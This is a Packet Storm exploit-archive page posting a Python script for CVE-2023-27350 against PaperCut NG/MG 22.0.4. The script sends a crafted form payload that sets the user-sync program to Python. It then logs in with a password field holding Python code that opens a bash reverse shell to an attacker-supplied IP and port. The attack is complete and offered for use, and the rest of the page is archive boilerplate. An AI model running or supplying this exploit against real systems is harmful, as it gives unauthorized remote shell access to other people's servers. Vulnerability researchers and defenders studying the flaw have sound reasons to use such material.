exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

PaperCut NG/MG 22.0.4 Remote Code Execution

PaperCut NG/MG 22.0.4 Remote Code Execution
Posted May 24, 2023
Authored by Mohin Paramasivam, MaanVader

PaperCut NG/MG version 22.0.4 remote code execution exploit.

tags | exploit, remote, code execution
advisories | CVE-2023-27350
SHA-256 | 1539d637da722a1ee7e83cceb9ee205cf15d43f93160ae5fe247b21150b68f96

PaperCut NG/MG 22.0.4 Remote Code Execution

Change Mirror Download
# Exploit Title: PaperCut NG/MG 22.0.4 - Remote Code Execution (RCE)
# Date: 13 May 2023
# Exploit Author: Mohin Paramasivam (Shad0wQu35t) and MaanVader
# Vendor Homepage: https://www.papercut.com/
# Version: 8.0 or later
# Tested on: 22.0.4
# CVE: CVE-2023-27350


import requests
import argparse

Group_payload = {
"service":"direct/1/OptionsUserSync/$OptionsUserSource.$Form",
"sp":"S0",
"Form0":"$Hidden,$Hidden$0,$Hidden$1,$PropertySelection,$Hidden$2,$Hidden$3,$Hidden$4,$Hidden$5,$Hidden$6,$Hidden$7,$Hidden$8,$Hidden$9,$Hidden$10,$Hidden$11,$Hidden$12,$Hidden$13,$Hidden$14,$TextField,$TextField$0,$RadioGroup,$Submit,$Checkbox$2,primaryCardIdLength,$Checkbox$3,secondaryCardIdLength,$Checkbox$5,$Hidden$15,$Hidden$16,$Hidden$17,$Hidden$18,$Hidden$19,$Hidden$20,$Hidden$21,$PropertySelection$4,$TextField$13,$Checkbox$6,$TextField$14,$TextField$15,$TextField$16,$RadioGroup$0,$Submit$1,$PropertySelection$5,$TextField$17,$PropertySelection$6,$TextField$18,primaryCardId2Length,$PropertySelection$7,$TextField$19,secondaryCardId2Length,$Checkbox$7,$TextField$20,$Checkbox$8,$Checkbox$9,$Checkbox$10,$Submit$2,$Submit$3,$Submit$4,$Submit$5",
"$Hidden":"Sf278fd737ffcaed6eb3d1f67c2ba5c6d",
"$Hidden$0":"F",
"$Hidden$1":"F",
"$Hidden$2":"OH4sIAAAAAAAAAJWQwUrDQBCGp60VBBUp4lWRnncRPIjSg4iHwrYNpBU8xXW7JitJdp1sis2hF5_BlxBP-lw-gF50Y2Mp6MW5DTP_fP8_z2_QzBDotSqI4UaiyC0xIg1JJnGihCQDY5VOs5HrfZ2jkMOpkVeHny8bD8VeHVa6sBYYVBqVnTLYCnhuIw91iDzxuI0stNgtn3Aa8zSkvkWVhies1MTc3mhMLBwzR6c_dFrSaUWnf9LbXqV1h3aCfDFbwt7BDGr3CO3fwXKrYsK04LEq5Pg8zZPex26j87i-XQdwkn2NIeGGi0gSoZPE4Ulpnki3mpFS8N556r4eXBR1qDFoqj5P5BxoLKyejfzhoAcAYzNDOPrnZxfZoKrWt6nN8odzG6WB5aFjNk77l-YLeZfbs8sBAAA.",
"$Hidden$3":"F",
"$Hidden$4":"X",
"$Hidden$5":"X",
"$Hidden$6":"X",
"$Hidden$7":"X",
"$Hidden$8":"X",
"$Hidden$9":"X",
"$Hidden$10":"X",
"$Hidden$11":"X",
"$Hidden$12":"X",
"$Hidden$13":"F",
"$Hidden$14":"X",
"$Hidden$15":"F",
"$Hidden$16":"S",
"$Hidden$17":"S",
"$Hidden$18":"S",
"$Hidden$19":"S",
"$Hidden$20":"F",
"$Hidden$21":"SSTANDARD_UNIX",
"$PropertySelection":"3,CUSTOM",
"$TextField":"/usr/bin/python3",
"$TextField$0":"/usr/bin/python3",
"$RadioGroup":"0",
"primaryCardIdLength":"8",
"secondaryCardIdLength":"8",
"$PropertySelection$4":"0,STANDARD_UNIX",
"$TextField$13":"",
"$TextField$14":"",
"$TextField$15":"",
"$TextField$16":"",
"$RadioGroup$0":"0",
"$PropertySelection$5":"NONE",
"$TextField$17":"",
"$PropertySelection$6":"NONE",
"$TextField$18":"employeeNumber",
"primaryCardId2Length":"8",
"$PropertySelection$7":"NONE",
"$TextField$19":"",
"secondaryCardId2Length":"8",
"$TextField$20":"",
"$Submit$4":"Apply"

}


parser = argparse.ArgumentParser(description="Papercut RCE")
parser.add_argument('--url',help='Url of the vunerable application example http://10.2.3.4:9191 dont need the trailing /')
parser.add_argument('--ip',help='our rev shell ip')
parser.add_argument('--port',help='our rev shell port')
args = parser.parse_args()

url = args.url
ip = args.ip
port = args.port

passwd_input = f"import os;os.system(\"/bin/bash -c 'bash -i >& /dev/tcp/{ip}/{port} 0>&1'\")"

final_payload = {
"service":"direct/1/Home/$Form$0",
"sp":"S0",
"Form0":"$Hidden$0,$Hidden$1,inputUsername,inputPassword,$PropertySelection$0,$Submit$0",
"$Hidden$0":"true",
"$Hidden$1":"X",
"inputUsername":"help",
"inputPassword":passwd_input,
"$PropertySelection$0":"en",
"$Submit$0":"Log+in"
}

# create a session
session = requests.Session()

# visit the first URL to set up the session
setup_url = url+"/app?service=page/SetupCompleted"
response = session.get(setup_url)
response.raise_for_status() # check for any errors

# visit the second URL using the same session
dashboard_url = url+"/app?service=page/Dashboard"
response = session.get(dashboard_url)
response.raise_for_status() # check for any errors

# URL to change user group
user_group_change_url = url+"/app"
response = session.post(user_group_change_url,data=Group_payload)
response.raise_for_status() # check for errors

# URL to gain RCE
rce_url = url+"/app"
response = session.post(rce_url,data=final_payload)
response.raise_for_status() # Check for any errors


# print the response text
print(response.text)


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close